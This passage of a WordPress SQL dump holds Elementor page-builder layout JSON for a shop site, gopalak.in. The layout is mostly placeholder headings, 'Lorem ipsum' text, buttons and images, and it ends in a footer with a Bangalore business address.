here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8490,1486,'_elementor_page_assets','a:0:{}'),(8492,1487,'_elementor_edit_mode','builder'),(8493,1487,'_elementor_template_type','wp-page'),(8494,1487,'_elementor_version','3.7.7'),(8495,1487,'_wp_page_template','elementor_canvas'),(8496,1487,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"99391c3\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"de33d81\"},{\"text\":\"List Item #1\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"4bd4895\"},{\"text\":\"List Item #2\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"6156b25\"},{\"text\":\"List Item #3\",\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"_id\":\"59990f4\"}],\"icon_align\":\"center\",\"divider\":\"yes\",\"divider_style\":\"dotted\",\"divider_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"32\",\"bottom\":\"32\",\"left\":\"32\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"0e3e07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"c2e40a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8497,1487,'_elementor_page_assets','a:0:{}'),(8499,1488,'_elementor_edit_mode','builder'),(8500,1488,'_elementor_template_type','wp-page'),(8501,1488,'_elementor_version','3.7.7'),(8502,1488,'_wp_page_template','elementor_canvas'),(8503,1488,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"50ce1c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#C3C3C321\"},\"elements\":[{\"id\":\"6cb9f56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":0},\"elements\":[{\"id\":\"d4fc894\",\"elType\":\"widget\",\"settings\":{\"view\":\"\",\"icon_list\":[{\"text\":\"List Item 